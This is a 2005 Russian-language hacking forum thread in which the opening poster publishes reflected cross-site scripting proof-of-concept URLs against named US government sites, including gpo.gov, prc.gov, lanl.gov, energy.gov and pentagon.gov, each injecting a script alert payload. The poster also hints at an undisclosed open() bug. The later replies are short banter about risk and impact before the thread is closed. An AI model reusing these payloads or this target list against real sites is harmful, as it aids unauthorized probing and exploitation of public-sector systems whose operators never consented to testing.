XSS на сайте "Пентагона". Анархия в зоне "gov".

Discussion in 'Уязвимости' started by k00p3r, 1 Nov 2005.

Thread Status:
Not open for further replies.
  1. k00p3r

    k00p3r Banned

    Joined:
    31 May 2005
    Messages:
    430
    Likes Received:
    8
    Reputations:
    2
    Начал проверять гос. сайты на баги и так сказать, получился неплохой урожай ;-). Куча xss-багов и попался даже древний баг в open(). (Но о нём говорить не буду, т.к. сайт быстро снесут).
    От xss конешн, сам понимаю толку никакого. Но всё равно впечатляет.
    Начнём с малого:
    http://search.access.gpo.gov/GPO/Search.asp?ct=GPO&q1=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E
    http://www.prc.gov/interrogatories.asp?irid=38516&irname=%3Cscript%3Ealert(%22x%22)%3C/script%3E
    http://www.stdgen.lanl.gov/cgi-bin/path_map.cgi?field=gene_id&term=MG142&mode=exact&dbname=%3Cscript%3Ealert(%22x%22)%3C/script%3E

    На сайте http://www.energy.gov, поле SEARCH не фильтруется. Вводим туда простейшую конструкцию <script>alert("x")</script>, в результате выскакивает алерт.

    И на сайте "немного" покрупнее....На сайте Пентагона.
    http://www.pentagon.gov/srch/search?template=%2Fsearch%2Fresults-template-dl.html&c=%3Cscript%3Ealert(%22x%22)%3C/script%3E&c=8268333F54379065&c=6FDF5BD0BF338D19&c=1DA2190B5E9F39D2&q=%3Cscript%3Ealert%28%22x%22%29%3C%2Fscript%3E&submit=Search&subcat=briefing+slides&sort=-pub_date
     
    #1 k00p3r, 1 Nov 2005
    Last edited by a moderator: 1 Nov 2005
    1 person likes this.
  2. kot777

    kot777 O-la-la!

    Joined:
    13 Aug 2004
    Messages:
    588
    Likes Received:
    435
    Reputations:
    454
    Это ещё раз доказывает что уязвимости есть везде. Но я не думаю что кто-то из наших станет атаковать правительственные сайты, палевно это как-то
     
  3. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    ого =) давай выкладывай open() в 1 раздел :D
     
  4. w4rd3n

    w4rd3n Banned

    Joined:
    6 Oct 2005
    Messages:
    143
    Likes Received:
    3
    Reputations:
    -4
    Может попробывать но Xss не добьешся нечего думаю админы на детскую шутку не купяться.
     
  5. CinerX

    CinerX Elder - Старейшина

    Joined:
    13 Feb 2006
    Messages:
    81
    Likes Received:
    17
    Reputations:
    13
    Огого!!! Ни че себе... На пентагоне... !!!!
     
  6. Gang100

    Gang100 Banned

    Joined:
    18 Feb 2006
    Messages:
    32
    Likes Received:
    24
    Reputations:
    21
    очнулись блин :-/ link
     
  7. CinerX

    CinerX Elder - Старейшина

    Joined:
    13 Feb 2006
    Messages:
    81
    Likes Received:
    17
    Reputations:
    13
    Блин ... Вы запарили! Не было меня просто долго в сети! А щас наверствываю, то что я пропустил...
     
  8. tclover

    tclover nobody

    Joined:
    13 Dec 2005
    Messages:
    741
    Likes Received:
    682
    Reputations:
    287
    А на дату публикации слабо посмотреть?
     
    1 person likes this.
  9. PinkPanther

    PinkPanther [ розовый мафиозо ]

    Joined:
    16 Mar 2005
    Messages:
    280
    Likes Received:
    75
    Reputations:
    85
    Чем наверстываеш? Флеймом? Нах так гнусно набивать се рейтинг? А насчет небыло в сети, посмотри на дату поста и на дату своей регистрации....

    CLOSED
     
Thread Status:
Not open for further replies.